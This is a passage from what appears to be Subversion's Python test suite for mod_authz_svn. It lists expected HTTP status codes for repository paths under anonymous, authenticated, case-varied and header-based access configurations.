{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, noauthwhenanon_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def authn(sbox):
"test authenticated only access"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/authn')
write_authz_file(sbox)
authn_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/', 'status': 401, },
{ 'path': '/repos', 'status': 401, },
{ 'path': '/repos/', 'status': 401, },
{ 'path': '/repos/A', 'status': 401, },
{ 'path': '/repos/A/', 'status': 401, },
{ 'path': '/repos/A/D', 'status': 401, },
{ 'path': '/repos/A/D/', 'status': 401, },
{ 'path': '/repos/A/D/gamma', 'status': 401, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with upper case username for user1
{ 'path': '', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with upper case username for user2
{ 'path': '', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, authn_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def authn_anonoff(sbox):
"test authenticated only access with anonoff"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/authn-anonoff')
write_authz_file(sbox)
anonoff_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/', 'status': 401, },
{ 'path': '/repos', 'status': 401, },
{ 'path': '/repos/', 'status': 401, },
{ 'path': '/repos/A', 'status': 401, },
{ 'path': '/repos/A/', 'status': 401, },
{ 'path': '/repos/A/D', 'status': 401, },
{ 'path': '/repos/A/D/', 'status': 401, },
{ 'path': '/repos/A/D/gamma', 'status': 401, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with upper case username for user1
{ 'path': '', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1_upper, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with upper case username for user2
{ 'path': '', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, anonoff_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def authn_lcuser(sbox):
"test authenticated only access with lcuser"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/authn-lcuser')
write_authz_file(sbox)
lcuser_tests = (
# try with upper case username for user1 (works due to lcuser option)
{ 'path': '', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1_upper, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1_upper, 'pw': user1_pass},
# try with upper case username for user2 (works due to lcuser option)
{ 'path': '', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2_upper, 'pw': user2_pass},
)
verify_gets(test_area_url, lcuser_tests)
# authenticated access only by group - a excuse to use AuthzSVNAuthoritative Off
# this is terribly messed up, Require group runs after mod_authz_svn.
# so if mod_authz_svn grants the access then it doesn't matter what the group
# requirement says. If we reject the access then you can use the AuthzSVNAuthoritative Off
# directive to fall through to the group check. Overall the behavior of setups like this
# is almost guaranteed to not be what users expect.
@SkipUnless(svntest.main.is_ra_type_dav)
def authn_group(sbox):
"test authenticated only access via groups"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/authn-group')
# Can't use write_authz_file() as most tests because we want to deny all
# access with mod_authz_svn so the tests fall through to the group handling
authz_name = sbox.authz_name()
svntest.main.write_authz_file(sbox, {
'/': '* =',
})
group_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/', 'status': 401, },
{ 'path': '/repos', 'status': 401, },
{ 'path': '/repos/', 'status': 401, },
{ 'path': '/repos/A', 'status': 401, },
{ 'path': '/repos/A/', 'status': 401, },
{ 'path': '/repos/A/D', 'status': 401, },
{ 'path': '/repos/A/D/', 'status': 401, },
{ 'path': '/repos/A/D/gamma', 'status': 401, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access repo including H
{ 'path': '', 'status': 301, 'user': user1, 'pw': <PASSWORD>1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
)
verify_gets(test_area_url, group_tests)
# This test exists to validate our behavior when used with the new authz
# provider system introduced in httpd 2.3.x. The Satisfy directive
# determines how older authz hooks are combined and the RequireA(ll|ny)
# blocks handles how new authz providers are combined. The overall results of
# all the authz providers (combined per the Require* blocks) are then
# combined with the other authz hooks via the Satisfy directive.
# Meaning this test requires that mod_authz_svn says yes and there is
# either a valid user or the ALLOW header is 1. The header may seem
# like a silly test but it's easier to excercise than say a host directive
# in a repeatable test.
@SkipUnless(svntest.main.is_httpd_authz_provider_enabled)
def authn_sallrany(sbox):
"test satisfy all require any config"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/sallrany')
write_authz_file(sbox)
allow_header = { 'ALLOW': '1' }
sallrany_tests = (
#anon access isn't allowed without ALLOW header
{ 'path': '', 'status': 401, },
{ 'path': '/', 'status': 401, },
{ 'path': '/repos', 'status': 401, },
{ 'path': '/repos/', 'status': 401, },
{ 'path': '/repos/A', 'status': 401, },
{ 'path': '/repos/A/', 'status': 401, },
{ 'path': '/repos/A/D', 'status': 401, },
{ 'path': '/repos/A/D/', 'status': 401, },
{ 'path': '/repos/A/D/gamma', 'status': 401, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access repo including H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
# anon is allowed with the ALLOW header
{ 'path': '', 'status': 301, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'headers': allow_header },
# these 3 tests return 403 instead of 401 becasue the config allows
# the anon user with the ALLOW header without any auth and the old hook
# system has no way of knowing it should return 401 since authentication is
# configured and can change the behavior. It could decide to return 401 just on
# the basis of authentication being configured but then that leaks info in other
# cases so it's better for this case to be "broken".
{ 'path': '/repos/A/D/H', 'status': 403, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 403, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'headers': allow_header },
# auth is configured and user1 is allowed access repo including H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
